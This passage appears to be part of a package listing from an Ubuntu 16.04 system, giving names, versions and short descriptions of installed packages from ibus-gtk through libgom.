ibus-gtk:amd64 1.5.11-1ubuntu2 Intelligent Input Bus - GTK+2 support
ibus-gtk3:amd64 1.5.11-1ubuntu2 Intelligent Input Bus - GTK+3 support
ibus-table 1.9.1-3ubuntu2 table engine for IBus
ifupdown 0.8.10ubuntu1.2 high level tools to configure network interfaces
im-config 0.29-1ubuntu12.4 Input method configuration framework
imagemagick 8:6.8.9.9-7ubuntu5.9 image manipulation programs -- binaries
imagemagick-6.q16 8:6.8.9.9-7ubuntu5.9 image manipulation programs -- quantum depth Q16
imagemagick-common 8:6.8.9.9-7ubuntu5.9 image manipulation programs -- infrastructure
indicator-application 12.10.1+16.04.20170120-0ubuntu1 Application Indicators
indicator-appmenu 15.02.0+16.04.20151104-0ubuntu1 Indicator for application menus.
indicator-bluetooth 0.0.6+16.04.20160526-0ubuntu1 System bluetooth indicator.
indicator-datetime 15.10+16.04.20160406-0ubuntu1 Simple clock
indicator-keyboard 0.0.0+16.04.20151125-0ubuntu1 Keyboard indicator
indicator-messages 13.10.1+15.10.20150505-0ubuntu1 indicator that collects messages that need a response
indicator-power 12.10.6+16.04.20160105-0ubuntu1 Indicator showing power state.
indicator-printers 0.1.7+15.04.20150220-0ubuntu2 indicator showing active print jobs
indicator-session 12.10.5+16.04.20160412-0ubuntu1 indicator showing session management, status and user switching
indicator-sound 12.10.2+16.04.20160406-0ubuntu1 System sound indicator.
info 6.1.0.dfsg.1-5 Standalone GNU Info documentation browser
init 1.29ubuntu4 System-V-like init utilities - metapackage
init-system-helpers 1.29ubuntu4 helper tools for all init systems
initramfs-tools 0.122ubuntu8.9 generic modular initramfs generator (automation)
initramfs-tools-bin 0.122ubuntu8.9 binaries used by initramfs-tools
initramfs-tools-core 0.122ubuntu8.9 generic modular initramfs generator (core tools)
initscripts 2.88dsf-59.3ubuntu2 scripts for initializing and shutting down the system
inputattach 1:1.4.9-1 utility to connect serial-attached peripherals to the input subsystem
insserv 1.14.0-5ubuntu3 boot sequence organizer using LSB init.d script dependency information
install-info 6.1.0.dfsg.1-5 Manage installed documentation in info format
intel-gpu-tools 1.14-1 tools for debugging the Intel graphics driver
intltool-debian 0.35.0+20060710.4 Help i18n of RFC822 compliant config files
ippusbxd 1.23-1 Daemon for IPP USB printer support
iproute2 4.3.0-1ubuntu3.16.04.2 networking and traffic control tools
iptables 1.6.0-2ubuntu3 administration tools for packet filtering and NAT
iputils-arping 3:20121221-5ubuntu2 Tool to send ICMP echo requests to an ARP address
iputils-ping 3:20121221-5ubuntu2 Tools to test the reachability of network hosts
iputils-tracepath 3:20121221-5ubuntu2 Tools to trace the network path to a remote host
irqbalance 1.1.0-2ubuntu1 Daemon to balance interrupts for SMP systems
isc-dhcp-client 4.3.3-5ubuntu12.7 DHCP client for automatically obtaining an IP address
isc-dhcp-common 4.3.3-5ubuntu12.7 common files used by all of the isc-dhcp packages
iso-codes 3.65-1 ISO language, territory, currency, script codes and their translations
iw 3.17-1 tool for configuring Linux wireless devices
jayatana 2.7-0ubuntu5 Java Native Library for ayatana project
kbd 1.15.5-1ubuntu5 Linux console font and keytable utilities
kerneloops-daemon 0.12+git20140509-2ubuntu1 kernel oops tracker
keyboard-configuration 1.108ubuntu15.3 system-wide keyboard preferences
klibc-utils 2.0.4-8ubuntu1.16.04.3 small utilities built with klibc for early boot
kmod 22-1ubuntu5 tools for managing Linux kernel modules
krb5-locales 1.13.2+dfsg-5ubuntu2 Internationalization support for MIT Kerberos
language-pack-en 1:16.04+20161009 translation updates for language English
language-pack-en-base 1:16.04+20160627 translations for language English
language-pack-gnome-en 1:16.04+20161009 GNOME translation updates for language English
language-pack-gnome-en-base 1:16.04+20160627 GNOME translations for language English
language-selector-common 0.165.4 Language selector for Ubuntu
language-selector-gnome 0.165.4 Language selector for Ubuntu
laptop-detect 0.13.7ubuntu2 attempt to detect a laptop
less 481-2.1ubuntu0.2 pager program similar to more
liba11y-profile-manager-0.1-0:amd64 0.1.10-0ubuntu3 Accessibility profile manager - Shared library
liba11y-profile-manager-data 0.1.10-0ubuntu3 Accessibility Profile Manager - GSettings data
libaa1:amd64 1.4p5-44build1 ASCII art library
libabw-0.1-1v5:amd64 0.1.1-2ubuntu2 library for reading and writing AbiWord(tm) documents
libaccount-plugin-1.0-0:amd64 0.1.8+16.04.20160201-0ubuntu1 libaccount-plugin for Unity Control Center
libaccount-plugin-generic-oauth 0.12+16.04.20160126-0ubuntu1 GNOME Control Center account plugin for single signon - generic OAuth
libaccount-plugin-google 0.12+16.04.20160126-0ubuntu1 GNOME Control Center account plugin for single signon - Google Auth
libaccounts-glib0:amd64 1.21+16.04.20160222-0ubuntu1 library for single signon
libaccounts-qt5-1:amd64 1.14+16.04.20151106.1-0ubuntu1 QT library for single sign on
libaccountsservice0:amd64 0.6.40-2ubuntu11.3 query and manipulate user account information - shared libraries
libacl1:amd64 2.2.52-3 Access control list shared library
libaio1:amd64 0.3.110-2 Linux kernel AIO access library - shared library
libalgorithm-diff-perl 1.19.03-1 module to find differences between files
libalgorithm-diff-xs-perl 0.04-4build1 module to find differences between files (XS accelerated)
libalgorithm-merge-perl 0.08-3 Perl module for three-way merge of textual data
libandroid-properties1 0.1.0+git20151016+6d424c9-0ubuntu7 Library to provide access to get, set and list Android properties
libao-common 1.1.0-3ubuntu1 Cross Platform Audio Output Library (Common files)
libao4:amd64 1.1.0-3ubuntu1 Cross Platform Audio Output Library
libapache2-mod-php7.0 7.0.22-0ubuntu0.16.04.1 server-side, HTML-embedded scripting language (Apache 2 module)
libapparmor-perl 2.10.95-0ubuntu2.7 AppArmor library Perl bindings
libapparmor1:amd64 2.10.95-0ubuntu2.7 changehat AppArmor library
libappindicator3-1 12.10.1+16.04.20170215-0ubuntu1 Application Indicators
libappstream-glib8:amd64 0.5.13-1ubuntu5 GNOME library to access AppStream services
libappstream3:amd64 0.9.4-1ubuntu3 Library to access AppStream services
libapr1:amd64 1.5.2-3 Apache Portable Runtime Library
libaprutil1:amd64 1.5.4-1build1 Apache Portable Runtime Utility Library
libaprutil1-dbd-sqlite3:amd64 1.5.4-1build1 Apache Portable Runtime Utility Library - SQLite3 Driver
libaprutil1-ldap:amd64 1.5.4-1build1 Apache Portable Runtime Utility Library - LDAP Driver
libapt-inst2.0:amd64 1.2.24 deb package format runtime library
libapt-pkg-perl 0.1.29build7 Perl interface to libapt-pkg
libapt-pkg5.0:amd64 1.2.24 package management runtime library
libarchive-zip-perl 1.56-2 Perl module for manipulation of ZIP archives
libarchive13:amd64 3.1.2-11ubuntu0.16.04.3 Multi-format archive and compression library (shared library)
libart-2.0-2:amd64 2.3.21-2 Library of functions for 2D graphics - runtime files
libasan2:amd64 5.4.0-6ubuntu1~16.04.5 AddressSanitizer -- a fast memory error detector
libasn1-8-heimdal:amd64 1.7~git20150920+dfsg-4ubuntu1.16.04.1 Heimdal Kerberos - ASN.1 library
libasound2:amd64 1.1.0-0ubuntu1 shared library for ALSA applications
libasound2-data 1.1.0-0ubuntu1 Configuration files and profiles for ALSA drivers
libasound2-plugins:amd64 1.1.0-0ubuntu1 ALSA library additional plugins
libaspell15:amd64 0.60.7~20110707-3build1 GNU Aspell spell-checker runtime library
libasprintf-dev:amd64 0.19.7-2ubuntu3 GNU Internationalization library development files
libasprintf0v5:amd64 0.19.7-2ubuntu3 GNU library to use fprintf and friends in C++
libassuan0:amd64 2.4.2-2 IPC library for the GnuPG components
libasyncns0:amd64 0.8-5build1 Asynchronous name service query library
libatasmart4:amd64 0.19-3 ATA S.M.A.R.T. reading and parsing library
libatk-adaptor:amd64 2.18.1-2ubuntu1 AT-SPI 2 toolkit bridge
libatk-bridge2.0-0:amd64 2.18.1-2ubuntu1 AT-SPI 2 toolkit bridge - shared library
libatk1.0-0:amd64 2.18.0-1 ATK accessibility toolkit
libatk1.0-data 2.18.0-1 Common files for the ATK accessibility toolkit
libatkmm-1.6-1v5:amd64 2.24.2-1 C++ wrappers for ATK accessibility toolkit (shared libraries)
libatm1:amd64 1:2.5.1-1.5 shared library for ATM (Asynchronous Transfer Mode)
libatomic1:amd64 5.4.0-6ubuntu1~16.04.5 support library providing __atomic built-in functions
libatspi2.0-0:amd64 2.18.3-4ubuntu1 Assistive Technology Service Provider Interface - shared library
libattr1:amd64 1:2.4.47-2 Extended attribute shared library
libaudio2:amd64 1.9.4-4 Network Audio System - shared libraries
libaudit-common 1:2.4.5-1ubuntu2 Dynamic library for security auditing - common files
libaudit1:amd64 1:2.4.5-1ubuntu2 Dynamic library for security auditing
libauthen-sasl-perl 2.1600-1 Authen::SASL - SASL Authentication framework
libavahi-client3:amd64 0.6.32~rc+dfsg-1ubuntu2 Avahi client library
libavahi-common-data:amd64 0.6.32~rc+dfsg-1ubuntu2 Avahi common data files
libavahi-common3:amd64 0.6.32~rc+dfsg-1ubuntu2 Avahi common library
libavahi-core7:amd64 0.6.32~rc+dfsg-1ubuntu2 Avahi's embeddable mDNS/DNS-SD library
libavahi-glib1:amd64 0.6.32~rc+dfsg-1ubuntu2 Avahi GLib integration library
libavahi-ui-gtk3-0:amd64 0.6.32~rc+dfsg-1ubuntu2 Avahi GTK+ User interface library for GTK3
libavc1394-0:amd64 0.5.4-4 control IEEE 1394 audio/video devices
libbabeltrace-ctf1:amd64 1.3.2-1 Common Trace Format (CTF) library
libbabeltrace1:amd64 1.3.2-1 Babeltrace conversion libraries
libbamf3-2:amd64 0.5.3~bzr0+16.04.20160824-0ubuntu1 Window matching library - shared library
libbind9-140:amd64 1:9.10.3.dfsg.P4-8ubuntu1.8 BIND9 Shared Library used by BIND
libblkid1:amd64 2.27.1-6ubuntu3.3 block device ID library
libbluetooth3:amd64 5.37-0ubuntu5.1 Library to use the BlueZ Linux Bluetooth stack
libboost-date-time1.58.0:amd64 1.58.0+dfsg-5ubuntu3.1 set of date-time libraries based on generic programming concepts
libboost-filesystem1.58.0:amd64 1.58.0+dfsg-5ubuntu3.1 filesystem operations (portable paths, iteration over directories, etc) in C++
libboost-iostreams1.58.0:amd64 1.58.0+dfsg-5ubuntu3.1 Boost.Iostreams Library
libboost-system1.58.0:amd64 1.58.0+dfsg-5ubuntu3.1 Operating system (e.g. diagnostics support) library
libbrlapi0.6:amd64 5.3.1-2ubuntu2.1 braille display access via BRLTTY - shared library
libbsd0:amd64 0.8.2-1 utility functions from BSD systems - shared library
libbz2-1.0:amd64 1.0.6-8 high-quality block-sorting file compressor library - runtime
libc-bin 2.23-0ubuntu9 GNU C Library: Binaries
libc-dev-bin 2.23-0ubuntu9 GNU C Library: Development binaries
libc6:amd64 2.23-0ubuntu9 GNU C Library: Shared libraries
libc6-dbg:amd64 2.23-0ubuntu9 GNU C Library: detached debugging symbols
libc6-dev:amd64 2.23-0ubuntu9 GNU C Library: Development Libraries and Header Files
libcaca0:amd64 0.99.beta19-2build2~gcc5.2 colour ASCII art library
libcairo-gobject2:amd64 1.14.6-1 Cairo 2D vector graphics library (GObject library)
libcairo-perl 1.106-1build1 Perl interface to the Cairo graphics library
libcairo2:amd64 1.14.6-1 Cairo 2D vector graphics library
libcairomm-1.0-1v5:amd64 1.12.0-1 C++ wrappers for Cairo (shared libraries)
libcamel-1.2-54:amd64 3.18.5-1ubuntu1 Evolution MIME message handling library
libcanberra-gtk-module:amd64 0.30-2.1ubuntu1 translates GTK+ widgets signals to event sounds
libcanberra-gtk0:amd64 0.30-2.1ubuntu1 GTK+ helper for playing widget event sounds with libcanberra
libcanberra-gtk3-0:amd64 0.30-2.1ubuntu1 GTK+ 3.0 helper for playing widget event sounds with libcanberra
libcanberra-gtk3-module:amd64 0.30-2.1ubuntu1 translates GTK3 widgets signals to event sounds
libcanberra-pulse:amd64 0.30-2.1ubuntu1 PulseAudio backend for libcanberra
libcanberra0:amd64 0.30-2.1ubuntu1 simple abstract interface for playing event sounds
libcap-ng0:amd64 0.7.7-1 An alternate POSIX capabilities library
libcap2:amd64 1:2.24-12 POSIX 1003.1e capabilities (library)
libcap2-bin 1:2.24-12 POSIX 1003.1e capabilities (utilities)
libcapnp-0.5.3:amd64 0.5.3-2ubuntu1 Cap'n Proto C++ library
libcc1-0:amd64 5.4.0-6ubuntu1~16.04.5 GCC cc1 plugin for GDB
libcdio-cdda1:amd64 0.83-4.2ubuntu1 library to read and control digital audio CDs
libcdio-paranoia1:amd64 0.83-4.2ubuntu1 library to read digital audio CDs with error correction
libcdio13:amd64 0.83-4.2ubuntu1 library to read and control CD-ROM
libcdparanoia0:amd64 3.10.2+debian-11 audio extraction tool for sampling CDs (library)
libcdr-0.1-1:amd64 0.1.2-2ubuntu2 library for reading and converting Corel DRAW files
libcgi-fast-perl 1:2.10-1 CGI subclass for work with FCGI
libcgi-pm-perl 4.26-1 module for Common Gateway Interface applications
libcgmanager0:amd64 0.39-2ubuntu5 Central cgroup manager daemon (client library)
libcheese-gtk25:amd64 3.18.1-2ubuntu3 tool to take pictures and videos from your webcam - widgets
libcheese8:amd64 3.18.1-2ubuntu3 tool to take pictures and videos from your webcam - base library
libcilkrts5:amd64 5.4.0-6ubuntu1~16.04.5 Intel Cilk Plus language extensions (runtime)
libclass-accessor-perl 0.34-1 Perl module that automatically generates accessors
libclone-perl 0.38-1build1 module for recursively copying Perl datatypes
libclucene-contribs1v5:amd64 2.3.3.4-4.1 language specific text analyzers (runtime)
libclucene-core1v5:amd64 2.3.3.4-4.1 core library for full-featured text search engine (runtime)
libclutter-1.0-0:amd64 1.24.2-1 Open GL based interactive canvas library
libclutter-1.0-common 1.24.2-1 Open GL based interactive canvas library (common files)
libclutter-gst-3.0-0:amd64 3.0.18-1 Open GL based interactive canvas library GStreamer elements
libclutter-gtk-1.0-0:amd64 1.6.6-1 Open GL based interactive canvas library GTK+ widget
libcmis-0.5-5v5:amd64 0.5.1-2ubuntu2 CMIS protocol client library
libcogl-common 1.22.0-2 Object oriented GL/GLES Abstraction/Utility Layer (common files)
libcogl-pango20:amd64 1.22.0-2 Object oriented GL/GLES Abstraction/Utility Layer
libcogl-path20:amd64 1.22.0-2 Object oriented GL/GLES Abstraction/Utility Layer
libcogl20:amd64 1.22.0-2 Object oriented GL/GLES Abstraction/Utility Layer
libcolamd2.9.1:amd64 1:4.4.6-1 column approximate minimum degree ordering library for sparse matrices
libcolord2:amd64 1.2.12-1ubuntu1 system service to manage device colour profiles -- runtime
libcolorhug2:amd64 1.2.12-1ubuntu1 library to access the ColorHug colourimeter -- runtime
libcolumbus1-common 1.1.0+15.10.20150806-0ubuntu4 error tolerant matching engine - common files
libcolumbus1v5:amd64 1.1.0+15.10.20150806-0ubuntu4 error tolerant matching engine - shared library
libcomerr2:amd64 1.42.13-1ubuntu1 common error description library
libcompizconfig0:amd64 1:0.9.12.2+16.04.20160823-0ubuntu1 Settings library for plugins - OpenCompositing Project
libcrack2:amd64 2.9.2-1ubuntu1 pro-active password checker library
libcroco3:amd64 0.6.11-1 Cascading Style Sheet (CSS) parsing and manipulation toolkit
libcryptsetup4:amd64 2:1.6.6-5ubuntu2.1 disk encryption support - shared library
libcups2:amd64 2.1.3-4ubuntu0.3 Common UNIX Printing System(tm) - Core library
libcupscgi1:amd64 2.1.3-4ubuntu0.3 Common UNIX Printing System(tm) - CGI library
libcupsfilters1:amd64 1.8.3-2ubuntu3.1 OpenPrinting CUPS Filters - Shared library
libcupsimage2:amd64 2.1.3-4ubuntu0.3 Common UNIX Printing System(tm) - Raster image library
libcupsmime1:amd64 2.1.3-4ubuntu0.3 Common UNIX Printing System(tm) - MIME library
libcupsppdc1:amd64 2.1.3-4ubuntu0.3 Common UNIX Printing System(tm) - PPD manipulation library
libcurl3:amd64 7.47.0-1ubuntu2.4 easy-to-use client-side URL transfer library (OpenSSL flavour)
libcurl3-gnutls:amd64 7.47.0-1ubuntu2.4 easy-to-use client-side URL transfer library (GnuTLS flavour)
libdaemon0:amd64 0.14-6 lightweight C library for daemons - runtime library
libdata-alias-perl 1.20-1build1 module to create aliases instead of copies
libdatrie1:amd64 0.2.10-2 Double-array trie library
libdb5.3:amd64 5.3.28-11 Berkeley v5.3 Database Libraries [runtime]
libdbus-1-3:amd64 1.10.6-1ubuntu3.3 simple interprocess messaging system (library)
libdbus-glib-1-2:amd64 0.106-1 simple interprocess messaging system (GLib-based shared library)
libdbusmenu-glib4:amd64 16.04.1+16.04.20160927-0ubuntu1 library for passing menus over DBus
libdbusmenu-gtk3-4:amd64 16.04.1+16.04.20160927-0ubuntu1 library for passing menus over DBus - GTK+ version
libdbusmenu-gtk4:amd64 16.04.1+16.04.20160927-0ubuntu1 library for passing menus over DBus - GTK+ version
libdbusmenu-qt2:amd64 0.9.3+16.04.20160218-0ubuntu1 Qt implementation of the DBusMenu protocol
libdbusmenu-qt5:amd64 0.9.3+16.04.20160218-0ubuntu1 Qt5 implementation of the DBusMenu protocol
libdconf1:amd64 0.24.0-2 simple configuration storage system - runtime library
libdebconfclient0:amd64 0.198ubuntu1 Debian Configuration Management System (C-implementation library)
libdecoration0:amd64 1:0.9.12.2+16.04.20160823-0ubuntu1 Compiz window decoration library
libdee-1.0-4:amd64 1.2.7+15.04.20150304-0ubuntu2 model to synchronize multiple instances over DBus - shared lib
libdevmapper1.02.1:amd64 2:1.02.110-1ubuntu10 Linux Kernel Device Mapper userspace library
libdfu1:amd64 0.7.0-0ubuntu4.3 Firmware update daemon library for DFU support
libdigest-hmac-perl 1.03+dfsg-1 module for creating standard message integrity checks
libdjvulibre-text 3.5.27.1-5 Linguistic support files for libdjvulibre
libdjvulibre21:amd64 3.5.27.1-5 Runtime support for the DjVu image format
libdmapsharing-3.0-2:amd64 2.9.34-1 DMAP client and server library - runtime
libdns-export162 1:9.10.3.dfsg.P4-8ubuntu1.8 Exported DNS Shared Library
libdns162:amd64 1:9.10.3.dfsg.P4-8ubuntu1.8 DNS Shared Library used by BIND
libdotconf0:amd64 1.3-0.2 Configuration file parser library - runtime files
libdouble-conversion1v5:amd64 2.0.1-3ubuntu2 routines to convert IEEE floats to and from strings
libdpkg-perl 1.18.4ubuntu1.2 Dpkg perl modules
libdrm-amdgpu1:amd64 2.4.76-1~ubuntu16.04.1 Userspace interface to amdgpu-specific kernel DRM services -- runtime
libdrm-intel1:amd64 2.4.76-1~ubuntu16.04.1 Userspace interface to intel-specific kernel DRM services -- runtime
libdrm-nouveau2:amd64 2.4.76-1~ubuntu16.04.1 Userspace interface to nouveau-specific kernel DRM services -- runtime
libdrm-radeon1:amd64 2.4.76-1~ubuntu16.04.1 Userspace interface to radeon-specific kernel DRM services -- runtime
libdrm2:amd64 2.4.76-1~ubuntu16.04.1 Userspace interface to kernel DRM services -- runtime
libdv4:amd64 1.0.0-7 software library for DV format digital video (runtime lib)
libe-book-0.1-1:amd64 0.1.2-2ubuntu1 library for reading and converting various e-book formats
libebackend-1.2-10:amd64 3.18.5-1ubuntu1 Utility library for evolution data servers
libebook-1.2-16:amd64 3.18.5-1ubuntu1 Client library for evolution address books
libebook-contacts-1.2-2:amd64 3.18.5-1ubuntu1 Client library for evolution contacts books
libecal-1.2-19:amd64 3.18.5-1ubuntu1 Client library for evolution calendars
libedata-book-1.2-25:amd64 3.18.5-1ubuntu1 Backend library for evolution address books
libedata-cal-1.2-28:amd64 3.18.5-1ubuntu1 Backend library for evolution calendars
libedataserver-1.2-21:amd64 3.18.5-1ubuntu1 Utility library for evolution data servers
libedataserverui-1.2-1:amd64 3.18.5-1ubuntu1 Utility library for evolution data servers
libedit2:amd64 3.1-20150325-1ubuntu2 BSD editline and history libraries
libefivar0:amd64 0.23-2 Library to manage UEFI variables
libegl1-mesa:amd64 17.0.7-0ubuntu0.16.04.2 free implementation of the EGL API -- runtime
libelf1:amd64 0.165-3ubuntu1 library to read and write ELF files
libemail-valid-perl 1.198-1 Perl module for checking the validity of Internet email addresses
libenchant1c2a:amd64 1.6.0-10.1build2 Wrapper library for various spell checker engines (runtime libs)
libencode-locale-perl 1.05-1 utility to determine the locale encoding
libeot0:amd64 0.01-3ubuntu1 Library for parsing/converting Embedded OpenType files
libepoxy0:amd64 1.3.1-1ubuntu0.16.04.2 OpenGL function pointer management library
libespeak1:amd64 1.48.04+dfsg-2 Multi-lingual software speech synthesizer: shared library
libestr0 0.1.10-1 Helper functions for handling strings (lib)
libetonyek-0.1-1:amd64 0.1.6-1ubuntu1 library for reading and converting Apple Keynote presentations
libevdev2:amd64 1.4.6+dfsg-1 wrapper library for evdev devices
libevdocument3-4:amd64 3.18.2-1ubuntu4.2 Document (PostScript, PDF) rendering library
libevent-2.0-5:amd64 2.0.21-stable-2ubuntu0.16.04.1 Asynchronous event notification library
libevent-core-2.0-5:amd64 2.0.21-stable-2ubuntu0.16.04.1 Asynchronous event notification library (core)
libevview3-3:amd64 3.18.2-1ubuntu4.2 Document (PostScript, PDF) rendering library - Gtk+ widgets
libexempi3:amd64 2.2.2-2 library to parse XMP metadata (Library)
libexif12:amd64 0.6.21-2 library to parse EXIF files
libexiv2-14:amd64 0.25-2.1ubuntu16.04.1 EXIF/IPTC/XMP metadata manipulation library
libexpat1:amd64 2.1.0-7ubuntu0.16.04.3 XML parsing C library - runtime library
libexporter-tiny-perl 0.042-1 tiny exporter similar to Sub::Exporter
libexttextcat-2.0-0:amd64 3.4.4-1ubuntu3 Language detection library
libexttextcat-data 3.4.4-1ubuntu3 Language detection library - data files
libfakeroot:amd64 1.20.2-1ubuntu1 tool for simulating superuser privileges - shared libraries
libfcgi-perl 0.77-1build1 helper module for FastCGI
libfcitx-config4:amd64 1:4.2.9.1-1ubuntu1.16.04.2 Flexible Input Method Framework - configuration support library
libfcitx-gclient0:amd64 1:4.2.9.1-1ubuntu1.16.04.2 Flexible Input Method Framework - D-Bus client library for Glib
libfcitx-utils0:amd64 1:4.2.9.1-1ubuntu1.16.04.2 Flexible Input Method Framework - utility support library
libfdisk1:amd64 2.27.1-6ubuntu3.3 fdisk partitioning library
libffi6:amd64 3.2.1-4 Foreign Function Interface library runtime
libfftw3-double3:amd64 3.3.4-2ubuntu1 Library for computing Fast Fourier Transforms - Double precision
libfftw3-single3:amd64 3.3.4-2ubuntu1 Library for computing Fast Fourier Transforms - Single precision
libfile-basedir-perl 0.07-1 Perl module to use the freedesktop basedir specification
libfile-copy-recursive-perl 0.38-1 Perl extension for recursively copying files and directories
libfile-desktopentry-perl 0.22-1 Perl module to handle freedesktop .desktop files
libfile-fcntllock-perl 0.22-3 Perl module for file locking with fcntl(2)
libfile-listing-perl 6.04-1 module to parse directory listings
libfile-mimeinfo-perl 0.27-1 Perl module to determine file types
libflac8:amd64 1.3.1-4 Free Lossless Audio Codec - runtime C library
libfont-afm-perl 1.20-1 Font::AFM - Interface to Adobe Font Metrics files
libfontconfig1:amd64 2.11.94-0ubuntu1.1 generic font configuration library - runtime
libfontembed1:amd64 1.8.3-2ubuntu3.1 OpenPrinting CUPS Filters - Font Embed Shared library
libfontenc1:amd64 1:1.1.3-1 X11 font encoding library
libframe6:amd64 2.5.0daily13.06.05+16.04.20160809-0ubuntu1 Touch Frame Library
libfreehand-0.1-1:amd64 0.1.1-1ubuntu1 Library for parsing the FreeHand file format structure
libfreerdp-cache1.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Free Remote Desktop Protocol library (cache library)
libfreerdp-client1.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Free Remote Desktop Protocol library (client library)
libfreerdp-codec1.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Free Remote Desktop Protocol library (codec library)
libfreerdp-common1.1.0:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Free Remote Desktop Protocol library (common library)
libfreerdp-core1.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Free Remote Desktop Protocol library (core library)
libfreerdp-crypto1.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Free Remote Desktop Protocol library (freerdp-crypto library)
libfreerdp-gdi1.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Free Remote Desktop Protocol library (GDI library)
libfreerdp-locale1.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Free Remote Desktop Protocol library (locale library)
libfreerdp-plugins-standard:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 RDP client for Windows Terminal Services (plugins)
libfreerdp-primitives1.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Free Remote Desktop Protocol library (primitives library)
libfreerdp-utils1.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Free Remote Desktop Protocol library (freerdp-utils library)
libfreetype6:amd64 2.6.1-0.1ubuntu2.3 FreeType 2 font engine, shared library files
libfribidi0:amd64 0.19.7-1 Free Implementation of the Unicode BiDi algorithm
libfuse2:amd64 2.9.4-1ubuntu3.1 Filesystem in Userspace (library)
libfwup0:amd64 0.5-2ubuntu5 Library to manage UEFI firmware updates
libfwupd1:amd64 0.7.0-0ubuntu4.3 Firmware update daemon library
libgail-3-0:amd64 3.18.9-1ubuntu3.3 GNOME Accessibility Implementation Library -- shared libraries
libgail-common:amd64 2.24.30-1ubuntu1.16.04.2 GNOME Accessibility Implementation Library -- common modules
libgail18:amd64 2.24.30-1ubuntu1.16.04.2 GNOME Accessibility Implementation Library -- shared libraries
libgbm1:amd64 17.0.7-0ubuntu0.16.04.2 generic buffer management API -- runtime
libgc1c2:amd64 1:7.4.2-7.3ubuntu0.1 conservative garbage collector for C and C++
libgcab-1.0-0:amd64 0.7-1 Microsoft Cabinet file manipulation library
libgcc-5-dev:amd64 5.4.0-6ubuntu1~16.04.5 GCC support library (development files)
libgcc1:amd64 1:6.0.1-0ubuntu1 GCC support library
libgck-1-0:amd64 3.18.0-1ubuntu1 Glib wrapper library for PKCS#11 - runtime
libgconf-2-4:amd64 3.2.6-3ubuntu6 GNOME configuration database system (shared libraries)
libgcr-3-common 3.18.0-1ubuntu1 Library for Crypto UI related tasks - common files
libgcr-base-3-1:amd64 3.18.0-1ubuntu1 Library for Crypto related tasks
libgcr-ui-3-1:amd64 3.18.0-1ubuntu1 Library for Crypto UI related tasks
libgcrypt20:amd64 1.6.5-2ubuntu0.3 LGPL Crypto library - runtime library
libgd3:amd64 2.1.1-4ubuntu0.16.04.8 GD Graphics Library
libgdata-common 0.17.4-1 Library for accessing GData webservices - common data files
libgdata22:amd64 0.17.4-1 Library for accessing GData webservices - shared libraries
libgdbm3:amd64 1.8.3-13.1 GNU dbm database routines (runtime version)
libgdk-pixbuf2.0-0:amd64 2.32.2-1ubuntu1.3 GDK Pixbuf library
libgdk-pixbuf2.0-common 2.32.2-1ubuntu1.3 GDK Pixbuf library - data files
libgee-0.8-2:amd64 0.18.0-1 GObject based collection and utility library
libgeis1:amd64 2.2.17+16.04.20160126-0ubuntu1 Gesture engine interface support
libgeoclue0:amd64 0.12.99-4ubuntu1 C API for GeoClue
libgeocode-glib0:amd64 3.18.2-1 geocoding and reverse geocoding GLib library using Nominatim
libgeoip1:amd64 1.6.9-1 non-DNS IP-to-country resolver library
libgeonames0:amd64 0.2+16.04.20160321-0ubuntu1 Parse and query the geonames database dump
libgettextpo-dev:amd64 0.19.7-2ubuntu3 GNU Internationalization library development files
libgettextpo0:amd64 0.19.7-2ubuntu3 GNU Internationalization library
libgexiv2-2:amd64 0.10.3-2 GObject-based wrapper around the Exiv2 library
libgirepository-1.0-1:amd64 1.46.0-3ubuntu1 Library for handling GObject introspection data (runtime library)
libgl1-mesa-dri:amd64 17.0.7-0ubuntu0.16.04.2 free implementation of the OpenGL API -- DRI modules
libgl1-mesa-glx:amd64 17.0.7-0ubuntu0.16.04.2 free implementation of the OpenGL API -- GLX runtime
libglapi-mesa:amd64 17.0.7-0ubuntu0.16.04.2 free implementation of the GL API -- shared library
libglew1.13:amd64 1.13.0-2 OpenGL Extension Wrangler - runtime environment
libglewmx1.13:amd64 1.13.0-2 OpenGL Extension Wrangler (Multiple Rendering Contexts)
libglib-perl 3:1.320-2 interface to the GLib and GObject libraries
libglib2.0-0:amd64 2.48.2-0ubuntu1 GLib library of C routines
libglib2.0-bin 2.48.2-0ubuntu1 Programs for the GLib library
libglib2.0-data 2.48.2-0ubuntu1 Common files for GLib library
libglibmm-2.4-1v5:amd64 2.46.3-1 C++ wrapper for the GLib toolkit (shared libraries)
libglu1-mesa:amd64 9.0.0-2.1 Mesa OpenGL utility library (GLU)
libgmime-2.6-0:amd64 2.6.20-1 MIME message parser and creator library - runtime
libgmp10:amd64 2:6.1.0+dfsg-2 Multiprecision arithmetic library
libgnome-bluetooth13:amd64 3.18.2-1ubuntu2 GNOME Bluetooth tools - support library
libgnome-desktop-3-12:amd64 3.18.2-1ubuntu1 Utility library for loading .desktop files - runtime files
libgnome-keyring-common 3.12.0-1build1 GNOME keyring services library - data files
libgnome-keyring0:amd64 3.12.0-1build1 GNOME keyring services library
libgnome-menu-3-0:amd64 3.13.3-6ubuntu3.1 GNOME implementation of the freedesktop menu specification
libgnomekbd-common 3.6.0-1ubuntu2 GNOME library to manage keyboard configuration - common files
libgnomekbd8:amd64 3.6.0-1ubuntu2 GNOME library to manage keyboard configuration - shared library
libgnutls-openssl27:amd64 3.4.10-4ubuntu1.4 GNU TLS library - OpenSSL wrapper
libgnutls30:amd64 3.4.10-4ubuntu1.4 GNU TLS library - main runtime library
libgoa-1.0-0b:amd64 3.18.3-1ubuntu2 library for GNOME Online Accounts
libgoa-1.0-common 3.18.3-1ubuntu2 library for GNOME Online Accounts - common files
libgom-1.0-0:amd64 0.3.1-1 Object mapper from GObjects to SQLite
libgom-1.0-common 0.3.1-1 libgom architecture-independent files
